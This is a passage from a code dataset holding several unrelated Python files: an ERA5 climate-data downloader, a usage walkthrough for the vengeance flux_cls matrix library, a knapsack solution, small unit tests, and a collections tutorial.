\"10m_u_component_of_wind\",\n \"10m_v_component_of_wind\",\n \"2m_dewpoint_temperature\",\n \"2m_temperature\",\n \"evaporation\",\n \"potential_evaporation\",\n \"surface_solar_radiation_downwards\",\n \"total_precipitation\",\n \"volumetric_soil_water_layer_1\",\n \"volumetric_soil_water_layer_2\",\n \"volumetric_soil_water_layer_3\",\n \"volumetric_soil_water_layer_4\",\n ],\n \"product_type\": \"reanalysis\",\n \"year\": f\"{year:d}\",\n \"month\": f\"{month:02d}\",\n \"day\": [f\"{day:02d}\" for day in range(1, 32)],\n \"time\": [f\"{hour:02d}:00\" for hour in range(0, 24)],\n \"area\": area,\n \"format\": \"netcdf\",\n },\n output_nc_file.as_posix(),\n )\n return output_nc_file.as_posix()\n else:\n\n LOG.info(f\"Skipping {year}-{month}\")\n return None\n\n\ndef main():\n parser = optparse.OptionParser(\n formatter=optparse.TitledHelpFormatter(), usage=HELP_TEXT\n )\n parser.add_option(\n \"-v\",\n \"--verbose\",\n action=\"store_true\",\n default=False,\n help=\"verbose output\",\n )\n parser.add_option(\n \"-d\",\n \"--data_folder\",\n action=\"store\",\n default=JASMIN_ERA5,\n dest=\"output_folder\",\n help=\"Output folder to save data\",\n )\n parser.add_option(\n \"-r\",\n \"--region\",\n action=\"store\",\n dest=\"region\",\n default=\"Ghana\",\n help=\"Region name\",\n )\n parser.add_option(\n \"-y\",\n \"--lat\",\n action=\"store\",\n default=\"1,12\",\n type=str,\n help=\"Minimum/maximum latitude in decimal degrees.\",\n )\n parser.add_option(\n \"-x\",\n \"--lon\",\n action=\"store\",\n default=\"-4,5\",\n type=str,\n help=\"Minimum/maximum longitude in decimal degrees.\",\n )\n\n (options, args) = parser.parse_args()\n if options.verbose:\n LOG.setLevel(logging.DEBUG)\n else:\n LOG.setLevel(logging.INFO)\n\n lats = [float(x) for x in options.lat.split(\",\")]\n lons = [float(x) for x in options.lon.split(\",\")]\n min_lat = min(lats) # south\n max_lat = max(lats) # north\n min_lon = min(lons) # west\n max_lon = max(lons) # east\n start_era_download(\n options.region,\n options.output_folder,\n min_lon,\n max_lon,\n min_lat,\n max_lat,\n )\n\n\ndef start_era_download(\n region, output_folder, min_lon, max_lon, min_lat, max_lat\n):\n LOG.debug(f\"Region: {region}\")\n LOG.debug(f\"Output: {output_folder}\")\n LOG.debug(f\"Lon: {min_lon}/{max_lon}\")\n LOG.debug(f\"Lat: {min_lat}/{max_lat}\")\n today = dt.datetime.now()\n this_year = today.year\n this_month = today.month\n wrapper = partial(\n grab_era5,\n region=region,\n output_folder=output_folder,\n mylat=[min_lat, max_lat],\n mylon=[min_lon, max_lon],\n )\n\n # create a thread pool of 8 threads\n years = np.arange(2000, dt.datetime.now().year + 1).astype(np.int)\n months = np.arange(1, 13).astype(np.int)\n with ThreadPoolExecutor(max_workers=8) as executor:\n for year in years:\n for month in months:\n if year <= this_year and month <= this_month:\n executor.submit(wrapper, month, year)\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"data_downloaders/era_downloader.py","file_name":"era_downloader.py","file_ext":"py","file_size_in_byte":6375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"107512050","text":"\n\"\"\"\nflux_cls\n * a lightweight wrapper around list-of-lists matrices\n * applies semantic names to rows based on header names\n * when vectorization gets too complicated, and you need (or want)\n efficient row-major iteration\n\"\"\"\nimport vengeance as ven\n\nfrom collections import namedtuple\nfrom dataclasses import dataclass\nfrom datetime import datetime\nfrom typing import Generator\nfrom typing import Union\nfrom vengeance import flux_cls\nfrom vengeance import print_runtime\nfrom vengeance import print_performance\nfrom vengeance import is_date\nfrom vengeance.util.text import vengeance_message\nfrom vengeance.classes.flux_row_cls import flux_row_cls\n\nfrom root.examples import share\n\nprofiler = share.resolve_profiler_function()\n\n\n@print_runtime\ndef main():\n # print(vengeance_message('vengeance {}, {}'.format(ven.__version__, ven.__release__)))\n\n flux = instantiate_flux(num_rows=50,\n num_cols=10,\n len_values=5)\n\n iterate_flux_rows(flux)\n iterate_primitive_rows(flux)\n\n flux_aggregation_methods(flux)\n flux_sort_and_filter_methods(flux)\n\n flux_row_methods(flux)\n flux_jagged_rows(flux)\n flux_column_methods(flux)\n flux_column_values(flux)\n\n flux_join()\n\n write_to_file(flux)\n read_from_file()\n\n # read_from_excel()\n # write_to_excel(flux)\n\n flux_subclass()\n\n # attribute_access_performance(flux)\n\n share.print_profiler(profiler)\n\n\ndef invalid_instantiations():\n \"\"\"\n 1) matrix must have at least 2 dimensions\n 2) certain reserved column names cannot appear as\n dynamic column names in matrix, eg\n __bool__\n __dict__\n ...\n __weakref__\n _headers\n array\n dict\n header_names\n headers\n is_empty\n is_header_row\n is_jagged\n join_values\n namedrow\n namedtuple\n reserved_names\n values\n \"\"\"\n from vengeance.classes.flux_row_cls import flux_row_cls\n\n reserved = flux_row_cls.reserved_names()\n reserved = '\\n'.join(reserved)\n print('reserved header names: \\n{}'.format(reserved))\n\n try:\n flux = flux_cls() # empty matrix is fine\n flux = flux_cls(['one', 'dimension']) # this is not, unknown if list is meant to be a row or column\n except IndexError as e:\n print(e)\n\n try:\n flux = flux_cls([['_headers',\n 'values',\n 'header_names',\n 'is_jagged',\n '__dict__',\n '__len__']])\n except NameError as e:\n print(e)\n\n print()\n\n\ndef instantiate_flux(num_rows=100,\n num_cols=3,\n len_values=3):\n\n some_namedtuple = namedtuple('some_namedtuple', ('col_a', 'col_b', 'col_c'))\n\n class some_cls:\n def __init__(self, v_a, v_b, v_c):\n self.col_a = v_a\n self.col_b = v_b\n self.col_c = v_c\n\n @property\n def property(self):\n return self.col_a\n\n def method(self):\n return self.col_a\n\n class some_slots_cls:\n __slots__ = ('col_a',\n 'col_b',\n 'col_c')\n\n def __init__(self, v_a, v_b, v_c):\n self.col_a = v_a\n self.col_b = v_b\n self.col_c = v_c\n\n # invalid_instantiations()\n\n # matrix organized like csv data, column names are provided in first row\n m = share.random_matrix(num_rows, num_cols, len_values)\n flux = flux_cls(m)\n\n # __init__ from objects\n m = [some_cls('a', 'b', 'c') for _ in range(3)]\n flux_b = flux_cls(m)\n\n # __init__ from slots objects\n m = [some_slots_cls('a', 'b', 'c') for _ in range(3)]\n flux_b = flux_cls(m)\n\n # __init__ from namedtuples\n m = [some_namedtuple('a', 'b', 'c') for _ in range(3)]\n flux_b = flux_cls(m)\n\n a = repr(flux)\n\n a = flux.headers\n a = flux.header_names()\n\n # help(flux.as_preview_array)\n flux.aap_indices = [-3, None]\n b = flux.as_preview_array\n flux.aap_indices = [1, 5+1]\n c = flux.as_preview_array\n\n a = flux.num_rows\n a = flux.num_cols\n\n a = flux.is_empty()\n a = flux.is_jagged()\n\n return flux\n\n\ndef iterate_flux_rows(flux):\n \"\"\" rows as flux_row_cls objects\n\n for row in flux:\n * preferred iteration syntax\n * skips header row, begins at flux.matrix[1]\n \"\"\"\n flux = flux.copy()\n\n assert flux.num_rows >= 10\n\n # individual rows\n row = flux.matrix[0]\n row = flux.matrix[5]\n row = flux.matrix[10]\n\n flux.label_row_indices() # to help with debugging: modifies row's __repr__ and adds .i attribute\n row = flux.matrix[0]\n row = flux.matrix[5]\n row = flux.matrix[10]\n\n # same results, but one method much faster than the other\n a = [row.dict() for row in flux]\n b = list(flux.dicts())\n\n a = [row.namedrow() for row in flux]\n b = list(flux.namedrows())\n\n a = [row.namedtuple() for row in flux]\n b = list(flux.namedtuples())\n\n # preferred iteration syntax\n # *** for row in flux: ***\n\n for row in flux:\n # help(row.as_preview_array) # to help with debugging: triggers a special view in PyCharm\n a = row.as_preview_array\n i = row.r_i # .r_i attribute added by flux.label_row_indices()\n\n # a = row.is_header_row()\n a = row.headers\n a = row.header_names()\n a = row.values\n\n a = row.namedtuple()\n a = row.namedrow()\n a = row.dict()\n\n # read row values\n a = row.col_a\n a = row['col_a']\n a = row[0]\n a = row.values[0] # row.values[0] is faster than row[0]\n\n # assign row values\n row.col_a = a\n row['col_a'] = a\n row[0] = a\n row.values[0] = a\n\n # assign multiple row values\n # row.values = ['bleh'] * len(row)\n # row.values[2:] = ['bleh'] * (len(row) - 2)\n\n # slice matrix\n for row in flux.matrix[5:-5]:\n pass\n\n # stride matrix\n for row in flux.matrix[::3]:\n pass\n\n # row offset comparisions\n for row_1, row_2 in zip(flux.matrix[1:], flux.matrix[2:]):\n if row_1.col_a == row_2.col_b:\n pass\n\n\ndef iterate_primitive_rows(flux):\n \"\"\" rows as primitive values \"\"\"\n flux = flux.copy()\n\n assert flux.num_rows >= 10\n\n # individual rows\n row = flux.matrix[0].values\n row = flux.matrix[5].values\n row = flux.matrix[10].values\n\n for row in flux.rows():\n a = row[0]\n\n for row in flux.rows(r_2=20):\n a = row[0]\n\n for row in flux.rows(5, 10):\n a = row[0]\n\n m = list(flux.rows())\n # or\n m = [row.values for row in flux]\n\n # build new matrix of primitive values\n m = [flux.header_names()]\n for r, row in enumerate(flux, 1):\n if r % 2 == 0 and row[0].startswith('a'):\n m.append(row.values)\n\n pass\n\n\ndef flux_aggregation_methods(flux):\n \"\"\"\n two EXTREMELY important methods introduced here:\n .map_rows()\n .map_rows_append()\n \"\"\"\n flux = flux.copy()\n\n flux.label_row_indices()\n\n flux['col_a'] = ['a'] * len(flux)\n flux['col_b'] = ['b'] * len(flux)\n\n a = flux.unique('col_a')\n a = flux.unique('col_a', 'col_b')\n\n # index_row() renamed to .map_rows()\n # index_rows() renamed to .map_rows_append()\n # a = flux.index_row('col_a')\n # a = flux.index_rows('col_a')\n\n # .map_rows() and .map_rows_append() have slightly different behavior\n d_1 = flux.map_rows('col_a', 'col_b')\n d_2 = flux.map_rows_append('col_a', 'col_b')\n\n k = ('a', 'b')\n a = d_1[k] # .map_rows(): only ever stores a single row\n b = d_2[k] # .map_rows_append(): a list of rows, effectively, a groupby operation\n\n # specify column values to map\n d = flux.map_rows('col_a')\n d = flux.map_rows('col_a', 'col_b')\n d = flux.map_rows(1, 2)\n d = flux.map_rows(slice(-3, -1))\n\n a = [100.0] * flux.num_rows\n b = [100.0] * len(flux)\n\n flux['value_a'] = a\n\n try:\n flux['value_a'] = b\n raise IndexError('column is too long, should raise error')\n except IndexError:\n pass\n\n d = flux.map_rows_append('col_a', 'col_b')\n countifs = {k: len(rows) for k, rows in d.items()}\n sumifs = {k: sum([row.value_a for row in rows])\n for k, rows in d.items()}\n\n # map dictionary values to types other than flux_row_cls\n d = flux.map_rows('col_a', 'col_b', rowtype=dict)\n d = flux.map_rows('col_a', 'col_b', rowtype=list)\n d = flux.map_rows('col_a', 'col_b', rowtype=tuple)\n\n d = flux.map_rows('col_a', 'col_b', rowtype='dict')\n d = flux.map_rows('col_a', 'col_b', rowtype='list')\n d = flux.map_rows('col_a', 'col_b', rowtype='tuple')\n d = flux.map_rows('col_a', 'col_b', rowtype='namedrow')\n d = flux.map_rows('col_a', 'col_b', rowtype='namedtuple')\n\n # group rows\n m = [['col_a', 'col_b', 'col_c']]\n m.extend(['a', 'b', 'c'] for _ in range(3))\n m.extend(['c', 'd', 'e'] for _ in range(3))\n m.extend(['e', 'f', 'g'] for _ in range(3))\n m.extend(['a', 'b', 'g'] for _ in range(2))\n m.extend(['c', 'b', 'e'] for _ in range(2))\n\n flux_b = flux_cls(m)\n a = flux_b.group_rows_append('col_a', 'col_c')\n a = flux_b.group_rows_append('col_a', 'col_c')\n\n\n\n # shared address locations\n m = share.random_matrix(0) + \\\n [['same_address_a', 'same_address_b', 'same_address_c']] * 1_000\n flux_b = flux_cls(m)\n\n flux_b.label_row_indices()\n d = flux_b.map_rows_append(lambda row: id(row.values))\n flux_b.matrix[1].col_a = 'm'\n\n\n\n # .contiguous()\n # group rows where *adjacent* values are identical\n items = list(flux.contiguous('col_a'))\n\n pass\n\n\ndef flux_sort_and_filter_methods(flux):\n\n # region {flux filter functions}\n\n # variables for filter functions\n criteria_a = {'c', 'd', 'e', 'f', 'z'}\n criteria_b = {'a', 'b', 'm'}\n\n def starts_with_a(_row_):\n \"\"\" first-class function\n\n filter functions should return a boolean value\n False for rows that will be excluded\n True for rows that will be included\n \"\"\"\n return (_row_.col_a.startswith('a') or\n _row_.col_b.startswith('a') or\n _row_.col_c.startswith('a'))\n\n def starts_with_criteria(_row_):\n \"\"\" first-class function referencing variables from closure\n\n filter functions should return a boolean value\n False for rows that will be excluded\n True for rows that will be included\n\n closure scope bypasses the need for additional parameters\n to be passed to function, eg\n starts_with_criteria(_row_, criteria_a, criteria_b)\n \"\"\"\n return (_row_.col_a[0] in criteria_a or\n _row_.col_b[0] in criteria_b)\n # endregion\n\n flux_a = flux.copy()\n flux_b = flux.copy()\n\n flux_a.label_row_indices()\n flux_b.label_row_indices()\n\n # in-place modifications\n flux_b.sort('col_b')\n flux_b.sort('col_a', 'col_b', 'col_c', reverse=[False, True, False])\n\n flux_b.filter(starts_with_a)\n flux_b.filter(starts_with_criteria)\n flux_b.filter_by_unique('col_a', 'col_b')\n\n # methodnames ending in -ed are not in-place, like python's sorted() and sort()\n # flux.sort(), flux.filter()\n # flux.sorted(), flux.filtered()\n\n # return new flux_cls\n flux_b = flux_a.sorted('col_b')\n flux_b = flux_a.sorted('col_a', 'col_b', 'col_c', reverse=[True, False, True])\n\n flux_b = flux_a.filtered(starts_with_a)\n flux_b = flux_a.filtered(starts_with_criteria)\n flux_b = flux_a.filtered_by_unique('col_a', 'col_b')\n\n pass\n\n\ndef flux_row_methods(flux):\n flux_a = flux.copy()\n flux_b = flux.copy()\n\n hdrs = share.random_matrix(0, num_cols=flux.num_cols)[0]\n hdrs = [h + '_new' for h in hdrs]\n rows = [['new' for _ in range(flux.num_cols)]\n for _ in range(10)]\n\n # insert / append rows from another raw lists\n flux_a.append_rows(rows)\n flux_a.insert_rows(5, rows[:3])\n\n # inserting rows at index 0 will overwrite existing headers\n a = flux_a.header_names()\n flux_a.insert_rows(0, [hdrs] + rows)\n b = flux_a.header_names()\n\n assert a != b\n\n # insert / append rows from another flux_cls\n flux_b.insert_rows(1, flux_a)\n flux_b.append_rows(flux_a.matrix[10:15])\n\n flux_a = flux.copy()\n flux_b = flux.copy()\n\n # append rows from flux_a and flux_b\n flux_c = flux_a + flux_b\n\n # delete all but first 10 rows\n del flux_a.matrix[11:]\n\n # inplace add\n flux_a += flux_b.matrix[-5:]\n flux_a += flux_b.matrix[10:15]\n flux_a += [['a', 'b', 'c']] * 10\n\n pass\n\n\ndef flux_jagged_rows(flux):\n flux = flux.copy()\n\n i = 4\n\n # check repr\n flux_repr_a = repr(flux)\n row_repr_a = repr(flux.matrix[i])\n\n # make some jagged rows\n flux.matrix[i].values = ['#err']\n flux.matrix[i + 2].values.extend(['#err', '#err'])\n assert flux.is_jagged()\n\n # check repr again with jagged rows\n flux_repr_b = repr(flux)\n row_repr_b = repr(flux.matrix[i])\n\n assert '🗲jagged🗲' not in flux_repr_a\n assert '🗲jagged' not in row_repr_a\n\n assert '🗲jagged🗲' in flux_repr_b\n assert '🗲jagged' in row_repr_b\n\n a = list(flux.jagged_rows())\n\n pass\n\n\ndef flux_column_methods(flux):\n flux_b = flux.copy()\n # flux = flux.copy(deep=True)\n\n flux.rename_columns({'col_a': 'renamed_a',\n 'col_b': 'renamed_b'})\n\n flux.insert_columns((0, 'inserted_a'),\n (0, 'inserted_b'),\n (0, 'inserted_c'),\n ('col_c', 'inserted_d'))\n\n flux.insert_columns(('inserted_d', 'inserted_x'),\n ('inserted_d', 'inserted_y'))\n\n flux.append_columns('append_a',\n 'append_b',\n 'append_c')\n\n flux.delete_columns('inserted_a',\n 'inserted_b',\n 'inserted_c',\n 'inserted_d')\n\n flux.rename_columns({'renamed_a': 'col_a',\n 'renamed_b': 'col_b'})\n\n # encapsulate insertion, deletion and renaming of columns within single function\n flux = instantiate_flux(num_rows=5,\n num_cols=5,\n len_values=3)\n flux.matrix_by_headers('col_c',\n 'col_b',\n {'col_a': 'renamed_a'},\n {'col_a': 'renamed_a_dup'},\n '(inserted_a)',\n '(inserted_b)',\n '(inserted_c)')\n\n # return new flux_cls from matrix_by_headers()\n flux = instantiate_flux(num_rows=5,\n num_cols=5,\n len_values=3)\n flux_b = flux.copy().matrix_by_headers({'col_c': 'renamed_c'},\n {'col_c': 'renamed_d'},\n '(inserted_a)')\n\n pass\n\n\ndef flux_column_values(flux):\n flux = flux.copy()\n\n assert 'col_a' in flux.headers\n assert 'col_b' in flux.headers\n assert 'col_c' in flux.headers\n\n # single column\n col = [row.col_b for row in flux]\n col = flux['col_b']\n col = flux.columns('col_b')\n col = flux[-1]\n col = list(col)\n\n # multiple columns\n cols = flux.columns('col_a', 'col_b', 'col_c')\n cols = flux.columns(0, -2, -1)\n cols = flux[1:3]\n\n a, b, c = flux.columns('col_a', 'col_b', 'col_c')\n\n # append a new column\n flux['append_d'] = [['new'] for _ in range(flux.num_rows)]\n # insert a new column\n flux[(0, 'insert_a')] = [['a'] for _ in range(flux.num_rows)]\n\n # set existing values from another column\n flux['col_a'] = flux['col_b']\n # append to a new column\n flux['col_new'] = flux['col_b']\n # combine column values\n flux['col_new'] = [(row.col_a, row.col_b, row.col_c) for row in flux]\n\n # apply function to column\n flux['col_c'] = [v.lower() for v in flux['col_c']]\n\n # convert datatypes in column\n # flux['col_c'] = [int(v) for v in flux['col_c']]\n # flux['col_c'] = [float(v) for v in flux['col_c']]\n # flux['col_c'] = [str(v) for v in flux['col_c']]\n # flux['col_c'] = [set(v) for v in flux['col_c']]\n # flux['col_c'] = [to_datetime(v, '%Y-%m-%d') for v in flux['col_c']]\n # etc...\n\n # shorthand to apply a single value to all rows in column\n flux['col_zz'] = ['blah'] * flux.num_rows\n flux['col_zz'] = [{'zz': [4, 5, 6]}] * flux.num_rows\n flux['col_zz'] = [[1, 2, 3] for _ in range(flux.num_rows)]\n\n flux['enum'] = flux.indices()\n\n pass\n\n\ndef flux_join():\n\n flux_a = flux_cls([['other_name', 'col_b', 'col_c'],\n *[['a', 'b', 1.11] for _ in range(10)],\n *[['c', 'd', 2.22] for _ in range(10)],\n *[['e', 'f', 3.33] for _ in range(10)]])\n flux_b = flux_cls([['name', 'id', 'cost', 'weight', 'amount'],\n ['a', '#6151-165', 50.10, 33.33, 4],\n ['e', '#8979-154', 100.50, 50.50, 6],\n ['g', '#6654-810', 130.00, 100.33, 10]])\n\n mapped_rows = flux_b.map_rows('name')\n\n flux_a.append_columns('id',\n 'cost',\n 'weight')\n\n for row_a in flux_a:\n row_b = mapped_rows.get(row_a.other_name)\n if row_b is None:\n continue\n\n # copy values from row_b\n row_a.weight = row_b.weight\n\n # or copy all column values in common with row_b\n row_a.join_values(row_b)\n assert row_a.id == row_b.id\n assert row_a.cost == row_b.cost\n assert row_a.weight == row_b.weight\n\n # .join method\n for row_a, row_b in flux_a.join(flux_b, {'other_name': 'name'}):\n row_a.cost = row_b.cost\n row_a.weight = row_b.weight\n\n\ndef write_to_file(flux):\n flux.to_csv(share.files_dir + 'flux_file.csv')\n flux.to_json(share.files_dir + 'flux_file.json')\n flux.serialize(share.files_dir + 'flux_file.flux')\n\n # .to_json() with no path argument returns a json string\n # json_str = flux.to_json()\n\n # .to_file()\n # flux.to_file(share.files_dir + 'flux_file.csv')\n # flux.to_file(share.files_dir + 'flux_file.json')\n # flux.to_file(share.files_dir + 'flux_file.flux')\n\n # specify encoding\n # flux.to_csv(share.files_dir + 'flux_file.csv', 'utf-8-sig')\n # flux.to_json(share.files_dir + 'flux_file.json', 'utf-8-sig')\n\n pass\n\n\ndef read_from_file():\n \"\"\" class methods (flux_cls, not flux) \"\"\"\n\n flux = flux_cls.from_csv(share.files_dir + 'flux_file.csv')\n flux = flux_cls.from_json(share.files_dir + 'flux_file.json')\n flux = flux_cls.deserialize(share.files_dir + 'flux_file.flux')\n\n # .from_file()\n # flux = flux_cls.from_file(share.files_dir + 'flux_file.csv')\n # flux = flux_cls.from_file(share.files_dir + 'flux_file.json')\n # flux = flux_cls.from_file(share.files_dir + 'flux_file.flux')\n\n # specify encoding\n # flux = flux_cls.from_csv(share.files_dir + 'flux_file.csv', 'utf-8-sig')\n # flux = flux_cls.from_json(share.files_dir + 'flux_file.json', 'utf-8-sig')\n\n # additional kw arguments control how file is read, such as: strict, lineterminator, ensure_ascii, etc\n # flux = flux_cls.from_csv(share.files_dir + 'flux_file.csv', strict=False, lineterminator='\\r')\n # nrows: reads a restricted number of rows from csv file\n # flux = flux_cls.from_csv(share.files_dir + 'flux_file.csv', nrows=50})\n\n pass\n\n\ndef read_from_excel():\n if ven.loads_excel_module is False:\n print('excel module excluded for platform compatibility')\n return\n\n flux = share.worksheet_to_flux('sheet1')\n flux = share.worksheet_to_flux('sheet1', c_1='col_a', c_2='col_a')\n flux = share.worksheet_to_flux('subsections', c_1='', c_2='')\n\n pass\n\n\ndef write_to_excel(flux):\n if ven.loads_excel_module is False:\n print('excel module excluded for platform compatibility')\n return\n\n share.write_to_worksheet('sheet2', flux)\n share.write_to_worksheet('sheet2', flux.matrix[:4])\n share.write_to_worksheet('sheet1', flux, c_1='F')\n\n pass\n\n\ndef flux_subclass():\n \"\"\"\n the transformation idioms in pandas DataFrames can be difficult to interpret, such as\n df['diff'] = np.sign(df.column1.diff().fillna(0)).shift(-1).fillna(0)\n\n it helps to encapsulate a series of complex state transformations\n in a separate class, where each transformation is given a meaningful\n method name and is responsible for one, and only one action\n\n the transformation definitions can be controlled by the .commands\n class variable, which provides a high-level description of its intended\n behaviors, without the need to look into any function bodies.\n controlling its behavior through discrete transformations also\n makes each state more explicit, modular and easier to maintain\n \"\"\"\n m = [['transaction_id', 'name', 'apples_sold', 'apples_bought', 'date'],\n ['id-001', 'alice', 2, 0, '2019-01-13'],\n ['id-002', 'alice', 0, 1, '2018-03-01'],\n ['id-003', 'bob', 2, 5, '2019-07-22'],\n ['id-004', 'chris', 2, 1, '2019-06-28'],\n ['id-005', None, 7, 1, None]]\n flux = flux_custom_cls(m, 'apples')\n\n # commands = flux_custom_cls.commands\n # print(commands)\n # a = repr(flux)\n\n flux.execute_commands(flux.commands, print_commands=True)\n\n # profiler: useful for helping to debug any profile_methods issues\n # flux.execute_commands(flux.commands, profiler=True)\n # flux.execute_commands(flux.commands, profiler='line_profiler')\n # flux.execute_commands(flux.commands, profiler='print_runtime')\n\n flux_b = flux.copy()\n flux.append_columns('bleh')\n flux_b.append_columns('bleh_b')\n\n pass\n\n\n# region @types\n@dataclass\nclass flux_row_custom_cls(flux_row_cls):\n \"\"\" used for autocompletion and type-hints \"\"\"\n transaction_id: str\n name: Union[str, None]\n apples_sold: int\n apples_bought: int\n date: Union[str, datetime]\n# endregion\n\n\nclass flux_custom_cls(flux_cls):\n\n # high-level summary of state transformations\n # (sort and append_columns call to the super class method)\n commands = (('sort', ('apples_sold', 'apples_bought'), {'reverse': [False, True]}),\n '_replace_null_names',\n '_convert_dates',\n '_count_unique_names',\n '_filter_apples_sold',\n ('append_columns', ('commission',\n 'apple_brand',\n 'revenue',\n 'apple_bonus'))\n )\n\n def __init__(self, matrix, product):\n super().__init__(matrix)\n\n self.product = product\n self.num_unique_names = None\n\n # def __iter__(self) -> Generator[flux_row_custom_cls, None, None]:\n # \"\"\" used for autocompletion and type-hints \"\"\"\n # return (row for row in self.matrix[1:])\n\n def _sort(self):\n self.sort('apples_sold', 'apples_bought')\n \n def _replace_null_names(self):\n for row in self:\n if row.name is None:\n row.name = 'unknown'\n\n def _convert_dates(self):\n # if no errors are expected\n # self['date'] = [to_datetime(o) for o in self['date']]\n\n # trap rowtype errors\n for i, row in enumerate(self, 1):\n is_valid, row.date = is_date(row.date)\n # if not is_valid:\n # print(\"invalid date: '{}', row {:,}\".format(row.date, o))\n\n def _count_unique_names(self):\n self.num_unique_names = len(self.unique('name'))\n\n def _filter_apples_sold(self):\n def by_apples_sold(_row_):\n return _row_.apples_sold >= 2\n\n self.filter(by_apples_sold)\n\n def __repr__(self):\n return '{} product: {}'.format(super().__repr__(),\n self.product)\n\n\n# @print_runtime\n# @print_performance(repeat=10)\ndef attribute_access_performance(flux):\n # from vengeance.classes.flux_row_cls import flux_row_cls\n\n # flux.matrix_to_namedrows()\n\n # flux_row_cls.__getattr__ = profiler(flux_row_cls.__getattr__)\n # flux_row_cls.__setattr__ = profiler(flux_row_cls.__setattr__)\n\n for row in flux:\n # read row values\n # a = row.col_a\n # b = row.col_b\n # c = row.col_c\n\n # modify row values\n # row.col_a = 'a'\n # row.col_b = 'b'\n # row.col_c = 'c'\n\n # read and modify row values\n row.col_a = row.col_a\n row.col_b = row.col_b\n row.col_c = row.col_c\n\n # row.values = [None] * len(row)\n\n\nif __name__ == '__main__':\n main()\n\n # if profiler.functions:\n # profiler.print_stats()\n","sub_path":"vengeance_unittest/root/flux_example.py","file_name":"flux_example.py","file_ext":"py","file_size_in_byte":25047,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"100033495","text":"c, m = (int(i) for i in input().split())\nkek = [[0 for i in range(m + 1)] for j in range(c + 1)]\n \nfor i in range(1, c+1):\n v, k = (int(i) for i in input().split())\n for j in range(m+1):\n dank = 0;\n if k <= j:\n dank = kek[i-1][j-k] + v\n kek[i][j] = max(kek[i-1][j], dank)\n \nprint(kek[c][m])","sub_path":"site/solutions/DMOJ/valday15p2.py","file_name":"valday15p2.py","file_ext":"py","file_size_in_byte":312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"567844545","text":"\"\"\"\nTest for SAR data access provider\n\"\"\"\n\nimport unittest\n\nfrom multiply_dummy.configuration import Configuration\nfrom multiply_dummy.state import TargetState\n\nfrom multiply_data_access.sar_data_access import SARDataAccessProvider\nimport datetime\n\nimport os\nimport tempfile\n\nclass TestSAR(unittest.TestCase):\n \n def setUp(self):\n self.odir = tempfile.mkdtemp() + os.sep\n t1 = datetime.datetime(2000,1,1)\n t2 = datetime.datetime(2002,12,31)\n tstate = TargetState(state={'lai':True, 'sm':False})\n r = {}\n r.update({'lr' : {'lat': 45., 'lon' : 11.2}})\n r.update({'ul' : {'lat': 47., 'lon' : 10.2}})\n self.c = Configuration(region=r, time_start=t1, time_stop=t2, tstate=tstate)\n\n def test_init(self):\n odir = self.odir + 'xyz'\n S = SARDataAccessProvider(config=self.c, output_dir=odir)\n self.assertTrue(os.path.exists(S.output_dir))\n self.assertTrue(S.output_dir[-1] == os.sep)\n\n def test_get_data(self):\n S = SARDataAccessProvider(config=self.c, output_dir=self.odir)\n r = S.get_data()\n self.assertTrue(isinstance(r, str))\n","sub_path":"tests/test_sar_access.py","file_name":"test_sar_access.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"366939331","text":"from collections import namedtuple, deque, defaultdict, OrderedDict, Counter\n\n# 表示一个点的坐标,tuple不能表示其点的含义,class小题大做.\n# 用namedtuple可以很方便地定义一种数据类型,它具备tuple的不变性,又可以根据属性来引用,使用十分方便\n# Point对象是tuple的一种子类\nPoint = namedtuple('Point', ['x', 'y'])\np = Point(1, 2)\nprint(p.x)\n\n# deque是为了高效实现插入和删除操作的双向列表,适合用于队列和栈\nq = deque(['a', 'b', 'c'])\nq.append('z')\nq.appendleft(1)\nprint(q)\n\n# defaultdict如果key不存在返回定义好的值\ndd = defaultdict(lambda: 'N/A')\ndd['a'] = 'A'\nprint(dd['a'])\nprint(dd['b'])\n\n# 可以将多个类似(key, value)组成的list/Tuple可以转换成dict\n# 使用dict时,Key是无序的。在对dict做迭代时,我们无法确定Key的顺序。\nd = dict([('a', 1), ('b', 2), ('c', 3)])\nprint(d)\nod = OrderedDict([('a', 1), ('b', 2), ('c', 3)])\nprint(od)\n\nd1 = dict((('Jack', 19), ('Marry', 27), ('Jerry', 9)))\nd1['z'] = 'zz'\nprint(d1)\n\n# Counter是一个简单的计数器,例如,统计字符出现的个数\nc = Counter()\nfor ch in 'programming':\n c[ch] += 1\nprint(c)\n\n\n\n\n\n\n\n","sub_path":"liaoxuefeng_python/webapp/cgi-bin/build_in/collections_test.py","file_name":"collections_test.py","file_ext":"py","file_size_in_byte":1202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"88909378","text":"from django.test import TestCase\n\nfrom django.urls import resolve\nfrom . import views\n# Create your tests here.\n# class myTest(TestCase):\n# def test_bad_maths(self):\n# self.assertEqual(1+1,5)\n\nclass HomePageTest(TestCase):\n def test_root_url_resolves_to_home_page_view(self):\n found=resolve('/message/')\n self.assertEqual(found.func,views.getForm)\n\nclass ApiPageTest(TestCase):\n def test_test_url_resolves_to_test_view(self):\n found=resolve('/message/test/')\n print(found.func)\n print(views.FBV.as_view())\n print(views.FBV.as_view())\n self.assertEqual(found.func,views.FBV.as_view())\n\n","sub_path":"mydjango/apps/message/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"211443512","text":"import logging\nimport sys\n\nconsole = logging.StreamHandler(sys.stdout)\nlogging.basicConfig(\n level=logging.DEBUG,\n format='[%(asctime)s] {%(filename)s:%(lineno)d} %(levelname)s - %(message)s',\n handlers=[console]\n)\n\nmodule_logger = logging.getLogger(__name__)","sub_path":"rpc_handlers/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":268,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"546144324","text":"import asyncio\nimport collections\nimport logging\nimport json\nfrom collections import defaultdict\nimport aiofiles\nimport re\nimport time\n\nLOGGER = logging.getLogger(__name__)\nQUEUES = defaultdict(lambda: {'obj': 